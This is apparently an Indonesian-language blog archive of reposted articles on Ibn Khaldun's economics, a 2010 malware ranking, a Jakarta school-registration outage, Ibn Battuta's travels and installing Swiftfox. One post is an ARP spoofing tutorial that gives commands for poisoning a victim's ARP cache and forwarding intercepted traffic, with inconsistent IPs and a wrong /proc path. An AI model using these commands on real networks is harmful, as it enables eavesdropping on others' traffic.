Menurut beliau, ketidakadilan tidak sahaja difahami sebagai merampas wang atau harta orang lain tanpa sebarang sebab yang diharuskan. Malah, mengambil harta orang lain atau menggunakan tenaganya secara paksa atau membuat dakwaan palsu terhadap orang lain. Begitu juga kalau meminta seseorang melakukan sesuatu yang berlawanan dengan Islam.

Beliau mengkategorikan perampas harta orang lain secara tidak sah hingga memberi kesan kepada kehidupan isteri dan keluarga sebagai paling tidak adil. Menurut beliau lagi, seseorang yang membeli harta seseorang dengan harga yang paling murah termasuk dalam kategori memiliki harta cara yang tidak betul.

Ketidakadilan seumpama di atas membawa kepada kejatuhan sesebuah negara dan keruntuhan sesebuah tamadun dengan segera. Menurut Ibn Khaldun, atas sebab sebab tersebutlah semua bentuk ketidakadilan dilarang oleh Islam.

Manusia dan Ekonomi
Berdasarkan analisis mendalam, didapati kesemua teori ekonomi dan idea Ibn Khaldun tentang manusia berdasarkan kepada prinsip-prinsip dan falsafah Islam. Ibn Khaldun tidak melihat fungsi utama manusia dalam aktiviti perekonomiannya seumpama haiwan ekonomi (economic animal). Sebaliknya beliau menganggap manusia itu sebagai manusia Islam (Islamic man/homo Islamicus) yang memerlukan pengetahuan ekonomi untuk memenuhi misinya di atas muka bumi ini.

Dalam hal ini, Ibn Khaldun menekankan perlunya manusia menjauhi perbuatan jahat. Sebaliknya manusia wajib mengikuti ajaran Islam sebagai model untuk memperbaiki dirinya dan mesti memberikan keutamaan kepada kehidupan akhirat.

Teori Pengeluaran
Ibn Khaldun mengemukakan teori bahawa kehidupan perekonomian sentiasa menghala ke arah pelaksanaan keseimbangan antara penawaran dengan permintaan. Menurut beliau pengeluaran berasaskan kepada faktor buruh dan kerjasama masyarakat. Bahkan beliau menganggap buruh merupakan faktor terpenting dalam proses pengeluaran walaupun faktor-faktor lain seperti tanah tersedia, tenaga buruh perlu untuk menghasilkan matlamat akhir.

Selain itu beliau berpendapat bahawa kenaikan yang tetap pada paras harga amat perlu untuk mengekalkan tahap produktiviti. Dalam hal ini beliau menyarankan agar masyarakat melakukan perancangan supaya setiap bidang pekerjaan dilakukan oleh orang yang

mahir dan cekap.
Walau bagaimanapun, pertumbuhan ekonomi (economic growth) dan pembahagian tenaga buruh bergantung rapat dengan pasaran. Di sini dapatlah dinyatakan bahawa teori pembahagian tenaga buruh, pengkhususan tenaga buruh, dan pertukaran yang dikemukakan oleh Ibn Khaldun 100 tahun lebih awal daripada Adam Smith yang juga mengemukakan teori yang sama.

Teori Nilai, Wang dan Harga
Ibn Khaldun tidak secara jelas membezakan antara teori nilai diguna (use value) dengan nilai pertukaran (exchange value). Tetapi beliau dengan tegas berhujah bahawa nilai sesuatu barangan bergantung kepada nilai buruh yang terlibat dalam proses pengeluaran.

"Semua usaha manusia dan semua tenaga buruh perlu digunakan untuk mendapatkan modal dan keuntungan. Tidak ada jalan lain bagi manusia untuk mendapatkan keuntungan melainkan melalui penggunaan buruh, kata Ibn Khaldun.

Teori Pengagihan
Menurut Ibn Khaldun harga barangan terdiri daripada tiga elemen utama iaitu gaji atau upah, keuntungan, dan cukai. Ketiga-tiga elemen ini merupakan pulangan kepada masyarakat. Oleh sebab itu, beliau membahagikan ekonomi kepada tiga sektor iaitu sektor pengeluaran, pertukaran, dan perkhidmatan awam.

Menurut Ibn Khaldun, nilai atau harga sesuatu barangan sama dengan kuantiti buruh yang terlibat dalam pengeluaran barangan berkenaan. Harga buruh merupakan asas kepada penentuan harga sesuatu barangan dan harga buruh itu sendiri ditentukan oleh mekanisme permintaan dan penawaran dalam pasaran.

Manakala keuntungan terhasil daripada perbezaan yang diperoleh oleh peniaga antara harga jualan dengan harga belian. Namun begitu perbezaan antara kedua-dua harga itu.

sumber : http://ilmuankhalidy.blogspot.com/2008/05/ibnu-khaldun.html

Label:

Jumat, 09 Juli 2010

10 Malware Paling Mengancam di Bulan Juni 2010

Sourcewire - Ajang World Cup 2010 yang digelar mulai bulan Juni rupanya tak hanya membuat heboh para pecinta sepakbola di berbagai penjuru dunia. Di ranah pervirusan, trojan yang menginfeksi file media terdeteksi marak beredar lantaran banyaknya pengguna internet yang men-download video terkait Piala Dunia 2010.

Provider software keamanan Sunbelt mengumumkan 10 besar malware yang paling mengancam selama bulan Juni 2010. Menurutnya, telah terjadi peningkatan serangan trojan pencuri password dan serangan yang mengancam file media player.

Worm Conficker juga terdeteksi kembali muncul dalam bentuk varian Downadup. Seperti varian sebelumnya, Downadup menyebar melalui jaringan dengan memanfaatkan kerentanan pada layanan Server Windows yang memungkinkan penyerang mengeksekusi kode secara remote ketika file sharing diaktifkan.

Downadup juga menyebar melalui removable drive dan memanfaatkan kelemahan password administrator guna dapat mematikan beberapa system service dan perlindungan anti-malcode.

Dari 10 daftar teratas malware yang marak beredar, ada beberapa malware pendatang baru yang terdeteksi muncul pada bulan Juni yaitu:
- Packed.Win32.Tdss.q (v) (TDSS Rootkit)
- Trojan.ASF.Wimad (v)
- Worm.Win32.Downad.Gen (v) (varian dari worm Conficker)

Trojan.ASF.Wimad (v) merupakan sebuah trojan yang menginfeksi file media Windows Media Player. Trojan ini akan me-redirect browser korban ke sebuah website untuk men-download file jahat. Trojan ini banyak terdeteksi pada bulan Juni karena maraknya aktivitas download video terkait Piala Dunia 2010.

Maraknya pertandingan sepakbola Piala Dunia yang berlangsung selama jam kerja membuat para pengguna internet yang tak bisa mengaksesnya lewat TV, tergoda untuk mencari tayangan Piala Dunia lewat layanan streaming online baik yang berasal dari sumber terpercaya atau tidak terpercaya. Untuk menghindari risiko penyebaran malware, adalah penting bagi pengguna internet untuk mengetahui kejelasan situs yang menawarkan audio dan video streaming tersebut sebelum men-downloadnya.

Sementara itu, Trojan.Win32.Generic!BT diketahui terus mendominasi 10 top malware dengan prosentase penyebaran sebesar 27,16%. Penyebaran trojan ini berkaitan dengan banyaknya downloader terkait scareware atau produk keamanan palsu.

Mengenai jenis malware yang beredar, enam dari 10 besar malware yang marak beredar adalah jenis Trojan, termasuk diantaranya Trojan-Spy.Win32.Zbot.gen, sebuah trojan pencuri password. Meskipun Trojan mendominasi 10 top malware dalam daftar, munculnya kembali varian terbaru Conficker menjadi tren menarik, yang menandakan bahwa malware ini kembali unjuk gigi.

Berikut ini adalah daftar 10 top malware yang paling banyak beredar selama bulan Juni:

1. Trojan.Win32.Generic!BT 27.16%
2. Trojan-Spy.Win32.Zbot.gen 4.68%
3. INF.Autorun (v) 4.05%
4. Trojan.Win32.Generic.pak!cobra 2.58%
5. BehavesLike.Win32.Malware (v) 1.48%
6. Packed.Win32.Tdss.q (v) 1.34%
7. Trojan.ASF.Wimad (v) 1.13%
8. Trojan.Win32.Malware 1.06%
9. Trojan.Win32.Agent 1.04%
10. Worm.Win32.Downad.Gen (v) 1.02%

(mls/mar)

Sumber : Sourcewire

Label:

PPDB `Online` Diserang 2.000 `Hacker`?

JAKARTA, KOMPAS.com — Pengamat telekomunikasi Mas Wigrantoro Roes Setiyadi mengatakan, ada hal yang penting dari kasus macetnya sistem online PPDB SMAN/ SMKN Dinas Pendidikan DKI Jakarta.

"Bagi saya yang penting adalah berikan bangku sekolah kepada murid yang memang berhak. Pastikan tidak ada praktik siluman secara manual," kata Sekjen Masyarakat Telekomunikasi (Mastel) ini, Minggu (4/7/2010).

"Ini jauh lebih penting dibanding kerusakan teknis soal akses aplikasinya karena kerusakan itu bisa saja disengaja dan bisa pula karena faktor eksternal atau internal," tambahnya.

Menurut Mas Wigrantoro, dari sisi akses internet, Disdik DKI perlu mendapatkan garansi dari pihak operator sebagai penyelenggara jaringan. Dia menduga, karena lalu lintas yang sangat tinggi pada waktu bersamaan, terjadi semacam bottle neck. Untuk itu, perlu ada jaminan dari pihak operator atas akses internetnya.

Satu hal lagi, keputusan Disdik DKI Jakarta tidak lagi menggunakan jasa PT Telkom Indonesia untuk mengoperasikan pendaftaran secara online dinilai sebagai langkah baik. "Ini langkah maju karena bisa mendorong untuk proses transfer of knowledge. Ini sangat positif," katanya.

Sistem online PPDB tahun 2004 sampai 2009 menggunakan sistem SIAP PSH Online dari PT Telkom Indonesia. Namun, tahun ini Disdik DKI secara mandiri menggunakan sistem buatan sendiri. Pendaftar PPDB SMAN/SMKN diharuskan menyerahkan fotokopi surat keterangan hasil ujian nasional (SKHUN), fotokopi kartu peserta, dan mengisi formulir pendaftaran.

Infrastruktur

Pengamat telekomunikasi lainnya, Budi Rahardjo, mengatakan, aplikasi laman internet membutuhkan sejumlah faktor, dari desain sampai ke aplikasinya. "Layanan data bisa saja sudah baik, tetapi kinerjanya belum maksimal atau bermasalah. Ini hal biasa di dunia teknologi informasi." kata dosen ITB itu.

Menurut dia, kinerja sebuah aplikasi laman internet tergantung pada unsur infrastruktur, seperti bandwidth, server, dan aplikasi. "Infrastruktur menyangkut bandwidth yang harus mencukupi untuk akses internet. Faktor server terkait dengan masalah memori dan sebagainya. Adapun faktor aplikasi menyangkut database dan sebagainya," kata Budi, yang pernah menjadi konsultan IT KPU untuk Pemilu 1999 dan 2004.

Kepala Seksi Info dan Data Disdik DKI, Budi Sulistyo, mengatakan, pihaknya tidak mengetahui penyebab gangguan pada sistem pendaftaran online itu.

"Silakan tanya ke humas saja. Saya tidak menangani hal teknisnya," katanya saat dihubungi melalui telepon.

Kepala Humas Disdik DKI Bowo Irianto juga mengaku tak bisa menjelaskan soal teknis gangguan sistem online. Sebelumnya, Bowo Irianto mengatakan, sistem PPDB online tahun ini diserang banyak hacker atau peretas. Karena serangan itu, sistem pada PPDB SD dan SMP sempat ngadat, tetapi bisa segera diatasi.

"Waktu masih PPDB SMP saja sudah ada 2.000-an hacker yang menyerang sistem kita," ujarnya.

Panggil Disdik DKI

Sementara itu, berdasarkan pantauan di situs http://jakarta.siap-psb.com, yang tahun sebelumnya menjadi situs PPDB di Jakarta, terdapat banyak pertanyaan, protes, dan luapan amarah warga masyarakat. Mereka menanyakan alasan Disdik DKI tak lagi memakai PT Telkom sampai kekacauan sistem PPDB yang telah menyengsarakan masyarakat.

Admin hanya menjelaskan bahwa Disdik DKI tak lagi memakai jasa PT Telkom. Meski demikian, sistem PPDB di kabupaten/kota lainnya masih menggunakan jasa perusahaan ini.

Ketua Komisi E DPRD DKI Firmansyah menyatakan sangat prihatin. "Saya sangat prihatin dan kecewa karena kegagalan PPDB online itu sangat merugikan masyarakat," katanya.(mls/mar)
sumber : kompas.

Label:

Mengenal Ibnu Batutah


Abu Abdullah Muhammad bin Battutah (24 Februari 1304 - 1368 atau 1377) adalah seorang pengembara Berber Maroko. Atas dorongan Sultan Maroko, Ibnu Batutah mendiktekan beberapa perjalanan pentingnya kepada seorang sarjana bernama Ibnu Juzay, yang ditemuinya ketika sedang berada di Iberia. Meskipun mengandung beberapa kisah fiksi, Rihlah merupakan catatan perjalanan dunia terlengkap yang berasal dari abad ke-14. Hampir semua yang diketahui tentang kehidupan Ibnu Batutah datang dari dirinya sendiri.

Meskipun dia mengiklankan bahawa hal-hal yang diceritakannya adalah apa yang dia lihat atau dia alami, kita tak bisa tahu kebenaran dari cerita tersebut. Lahir di Tangier, Maroko antara tahun 1304 dan 1307, pada usia sekitar dua puluh tahun Ibnu Batutah berangkat haji -- ziarah ke Mekah. Setelah selesai, dia melanjutkan perjalanannya hingga melintasi 120.000 kilometer sepanjang dunia Muslim (sekitar 44 negara modern).

Perjalanannya ke Mekah melalui jalur darat, menyusuri pantai Afrika Utara hingga tiba di Kairo. Pada titik ini ia masih berada dalam wilayah Mamluk, yang relatif aman. Jalur yang umu digunakan menuju Mekah ada tiga, dan Ibnu Batutah memilih jalur yang paling jarang ditempuh: pengembaraan menuju sungai Nil, dilanjutkan ke arah timur melalui jalur darat menuju dermaga Laut Merah di 'Aydhad. Tetapi, ketika mendekati kota tersebut, ia dipaksa untuk kembali dengan alasan pertikaian lokal.

Kembail ke Kairo, ia menggunakan jalur kedua, ke Damaskus (yang selanjutnya dikuasai Mamluk), dengan alasan keterangan/anjuran seseorang yang ditemuinya di perjalanan pertama, bahwa ia hanya akan sampai di Mekah jika telah melalui Suriah. Keuntungan lain ketika memakai jalur pinggiran adalah ditemuinya tempat-tempat suci sepanjang jalur tersebut -- Hebron, Yerusalem, dan Betlehem, misalnya -- dan bahwa penguasa Mamluk memberikan perhatian khusus untuk mengamankan para peziarah.

Setelah menjalani Ramadhan di Damaskus, Ibnu Batutah bergabung dengan suatu rombongan yang menempuh jarak 800 mil dari Damaskus ke Madinah, tempat dimakamkannya Muhammad. Empat hari kemudian, dia melanjutkan perjalanannya ke Mekah. Setelah melaksanakan rangkaian ritual haji, sebagai hasil renungannya, dia kemudian memutuskan untuk melanjutkan mengembara. Tujuan selanjutnya adalah Il-Khanate (sekarang Iraq dan Iran.
Dengan cara bergabung dengan suatu rombongan, dia melintasi perbatasan menuju Mesopotamia dan mengunjungi najaf, tempat dimakamkannya khalifah keempat Ali. Dari sana, dia melanjutkan ke Basrah, lalu Isfahan, yang hanya beberapa dekade jaraknya dengan penghancuran oleh Timur. Kemudian Shiraz dan Baghdad (Baghdad belum lama diserang habis-habisan oleh Hulagu Khan).

Di sana ia bertemu Abu Sa'id, pemimpin terakhir Il-Khanate. Ibnu Batutah untuk sementara mengembara bersama rombongan penguasa, kemudian berbelok ke utara menuju Tabriz di Jalur Sutra. Kota ini merupakan gerbang menuju Mongol, yang merupakan pusat perdagangan penting.

Setelah perjalanan ini, Ibnu Batutah kembali ke Mekah untuk haji kedua, dan tinggal selama setahun sebelum kemudian menjalani pengembaraan kedua melalui Laut Merah dan pantai Afrika Timur. Persinggahan pertamanya adalah Aden, dengan tujuan untuk berniaga menuju Semenanjung Arab dari sekitar Samudera Indonesia. Akan tetapi, sebelum itu, ia memutuskan untuk melakukan petualangan terakhir dan mempersiapkan suatu perjalanan sepanjang pantai Afrika.

Menghabiskan sekitar seminggu di setiap daerah tujuannya, Ibnu Batutah berkunjung ke Ethiopia, Mogadishu, Mombasa, Zanzibar, Kilwa, dan beberapa daerah lainnya. Mengikuti perubahan arah angin, dia bersama kapal yang ditumpanginya kembali ke Arab selatan. Setelah menyelesaikan petualangannya, sebelum menetap, ia berkunjung ke Oman dan Selat Hormuz. Setelah selesai, ia berziarah ke Mekah lagi.

Setelah setahun di sana, ia memutuskan untuk mencari pekerjaan di kesultanan Delhi. Untuk keperluan bahasa, dia mencari penterjemah di Anatolia. Kemudian di bawah kendali Turki Saljuk, ia bergabung dengan sebuah rombongan menuju India. Pelayaran laut dari Damaskus mendaratkannya di Alanya di pantai selatan Turki sekarang. Dari sini ia berkelana ke Konya dan Sinope di pantai Laut Hitam.

Setelah menyeberangi Laut Hitam, ia tiba di Kaffa, di Crimea, dan memasuki tanah Golden Horde. Dari sana ia membeli kereta dan bergabung dengan rombongan Ozbeg, Khan dari Golden Horde, dalam suatu perjalanan menuju Astrakhan di Sungai Volga.

Label:

Memahami Apa Itu ARP Poisoning dan ARP Spoofing

Sebenernya tulisan tentang arp spoofing atau arp poison banyak di internet,, disini ane cuma posting ya cuma mau update blog aja, hahahaa,,tapi lumayan lah bagi yang suka sniffing di warnet pake tools kayak dsniff, ettercap, cain and abel tapi gak tau gimana cara kerjanya tools tersebut disini gue jelasin secara singkat tentang ARP spoofing. ARP spoofing merupakan konsep dari serangan penyadapan diantara terhadap dua mesin yang sedang berkomunikasi atau yang disebut dengan Man in The Middle Attack. Sebuah aplikasi alat bantu untuk menganalisa paket dari protokol kita pergunakan alat yang disebut wireshark di unduh di situs http://www.wireshark.org. Kita akan melakukan ARP spoofing dengan menggunakan skrip “arpret.c” skrip tersebut dibuat dengan bahasa pemrograman C yang bekerja dengan mengirim ARP reply palsu kepada host target dan hanya bisa dijalankan dalam sistem operasi Linux. Linux Slackware versi 12.1 berjalan di komputer penyadap yang menjalankan skrip tersebut mempunyai IP 192.168.10.22 dengan MAC address 00:1e:ec:c4:86:67 selain itu dilakukan setting kernel untuk bisa mem-forward paket ke tujuan lain dengan kata lain meneruskan paket yang telah diterima.

Host yang menjadi sasaran adalah komputer yang berfungsi sebagai gateway menjalankan sistem operasi Linux Fedora 8 dengan IP 192.168.10.7 (00:0C:F1:86:E3:35) dan komputer pengguna dengan sistem operasi Ms Windows XP SP2 yang menggunakan layanan yang ada di gateway dengan IP 192.168.10.4 (00:0C:F1:96:A7:1C).

Setelah proses kompilasi skrip “arpret.c” di sistem operasi Linux Slackware, lalu kita akan mencoba mengirimkan sebuah ARP-reply palsu kepada komputer 192.168.10.7 dimana headernya kita memberikan MAC address penyusup tapi dengan IP 192.168.10.4 yang bertindak sebagai gateway dengan maksud komputer agar komputer penyusup dianggap gateway oleh komputer 192.168.10.7. Kita mengatur kernel agar bisa melakukan meneruskan paket dengan perintah dalam konsole Linux seperti di bawah ini :

# echo ”1” > /proc/sys/net/ipv4/ip_forwarding

Dilanjutkan dengan kompilasi skrip dan menjalankan skrip dengan opsi menggunakan kartu Ethernet eth0. Header ARP-reply berisi alamat IP gateway 192.168.10.4 tapi dengan MAC address 00:1e:ec:c4:86:67 lalu dikirimkan ke IP 192.168.10.6 dan opsi –k2 dengan maksud proses meracuni ARP cache dilakukan secara terus-menerus.

./arpret -i eth0 -s 192.168.10.8 -S 00:1e:ec:c4:86:67 -d 192.168.10.6 -D 00:50:ba:83:1b:d1 -k2

Hal diatas mengakibatkan ter-manipulasinya isi cache ARP yang sebelumnya cache untuk komputer gateway adalah 00:0C:F1:96:A7:1C tapi berubah menjadi MAC address dari komputer penyusup 00:1e:ec:c4:86:67. Seperti yang terlihat pada gambar dibawah ini pada komputer 192.168.10.7 yang menjalankan sistem operasi MS Windows XP SP2 dengan mengetikkan arp –a untuk melihat semua ARP cache yang tersimpan.
sebelum spoofing

sebelum arp spoofing

Dan berikut gambar ARP cache setelah diracuni menyimpan MAC address penyusup untuk alamat IP 192.168.10.4.

arp cache setelah arp spoofing berubah

Dalam setiap host dan perangkat switch dalam jaringan menyimpan catatan daftar MAC dan IP Address yang disebut dengan ARP cache. Sistem akan menggunakan ARP cache untuk berhubungan dengan host lain dalam pertukaran data. Jika alamat tidak terdapat dalam daftar di memori atau ARP cache, sistem akan menggunakan ARP untuk mencari tahu MAC address pada host tujuan dan perangkat switch menggunakan tabel ARP untuk membatasi trafik hanya untuk MAC address yang terdaftar pada port.

Arp spoofing adalah teknik untuk menyadap frame data dalam jaringan lokal, mengubah lalu lintas data atau memberhentikan lalu lintas data. Seorang penyusup dalam melakukan ARP spoofing akan mengirim pesan ARP palsu ke ethernet jaringan lokal dengan tujuan menyamakan alamat MAC dengan komputer lain misalnya komputer gateway. Jadi setiap lalu lintas data terhadap IP gateway akan mengarah terlebih dahulu ke komputer penyusup sebagai gateway palsu yang akhirnya diteruskan ke gateway yang asli dan memungkinkan untuk memodifikasi data sebelum diteruskan ke gateway. Aksi ini disebut dengan Man in The Middle Attack, serangan jenis ini bisa kita gambarkan sebagai berikut :

sebelum spoofing

sebelum ARP spoofing

Sebelum serangan terjadi ARP cache dalam keadaan normal menyimpan alamat MAC dari tujuan transmisi data. Target penyadapan adalah di antara dua mesin yang terhubung pada jaringan yang sama dengan penyusup yaitu korban 1 pada IP 192.168.10.4 (00:0C:F1:96:A7:1C) dengan mesin korban 2 pada IP 192.168.10.7 (00:0C:F1:86:E3:35) dan mesin penyusup pada IP (00:1e:ec:c4:86:67). Pada serangan dilakukan sang penyusup akan melakukan pengiriman paket ARP-Reply yang berisi MAC dari mesin penyusup.

penyusup —> korban 1 : (IP korban 2) is at (MAC penyusup)
penyusup —> korban 2 : (IP korban 1) is at (MAC penyusup)

Jika kita analisa paket-paket yang dikirimkan penyusup ke korban menggunakan aplikasi bantu untuk analisa paket dalam jaringan yang bernama wireshark akan tampak seperti dibawah ini :

arp poison

analisa arp poison dengan wireshark

Seperti yang kita lihat komputer penyusup mengirim ARP-reply kepada IP 192.168.10.4 berikut dengan alamat MAC dari komputer penyusup 00:1e:ec:c4:86:67 dan hal yang sama dikirimkan ARP-reply kepada IP 192.168.10.7 berikut dengan alamat MAC dari komputer penyusup 00:1e:ec:c4:86:67. Lalu lintas yang terjadi antara korban 1 dan korban 2 akan diterima terlebih dahulu oleh komputer penyusup sebelum di teruskan ke tujuan data yang bisa disadap adalah transmisi tidak menggunakan enkripsi atau berbasis plain text seperti TELNET, FTP, POP, RLOGIN, SSH1, ICQ, SMB, NS, MySQL, HTTP, NNTP, X11, NAPSTER, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, HALF LIFE, QUAKE 3, MSN, YMSG.

Sudah cukup disini saja,, maaf tanggung,, .. tinggal kasih komen aje klo krang jlas,,gara tulisan gak jelas di atas,,,

sumber : http://logsmylife.wordpress.com/

Label:

Sabtu, 03 Juli 2010

Swiftfox: Browser alternatif dari Firefox

Mungkin anda semua sudah familiar dengan yang namanya mozilla sebagai web browser anda. Begitu juga dengan saya yang sudah lama menggunakan web browser tersebut. Sebetulnya cukup banyak web browser-browser yang lain yang tidak kita ketahui, mungkin itu semua karena katerbatasan ilmu kita dan kita cuma mau menggunakan apa yang sudah menjadi penggunaan yang bisa dikatakan sudah mendunia.

Kali ini saya ingin membahas sedikit tentang web browser yang lain yang juga bisa digunakan untuk berselancar di dunia maya.

Ada sebuah web browser yang saya dapatkan ketika saya sedang asik-asik berselancar di dunia maya. sebuah web browser yang juga masih satu keturunan dengan mozilla. Tanpa sengaja aku nemuin artikel tentang web browser namanya Swiftfox, yang dikatakan disitu swiftfox adalah alternatif dari firefox dan hanya tersedia untuk pengguna linux saja. Mungkin agak basi juga ya nih artikel, tapi ya gpp orang aku juga baru denger, Masih belum manteb, aku coba cari artikel-artikel dari blog tetangga dan nemuin sedikit pencerahan yang intinya

Swiftfox, browser kelas “lightweight” merupakan pengembangan dari Mozilla Firefox untuk Linux yang dioptimalkan. Pengembangan SwiftFox yang tersedia untuk prosesor AMD dan Intel ini, didasarkan pada sebagian besar kode sumber Firefox yang tersedia.

Sekilas memang tampak seperti firefox, bisa menggunakan addons dari firefox dan emang firefox. Buka 10 new tab biasanya kalo di firefox ngadat, kalo di Swiftfox enggak looh apa cuma perasaaan aku aja ya.....??? Langsung aja, untuk menginstall Swiftfox dari ubuntu tercinta, ikuti perintahnya step by step dibawah ini:

1. Edit dan tambahkan baris berikut ini di /etc/apt/sources.list
deb http://getswiftfox.com/builds/debian unstable non-free

2. Update paket juragan:
$ sudo apt-get update

3. Install Swiftfox:
$ sudo apt-get install swiftfox-prescott

Semoga artikel yang kecil ini bisa bermamfaat bagi kita semuanya..... maju terus open source.

Label: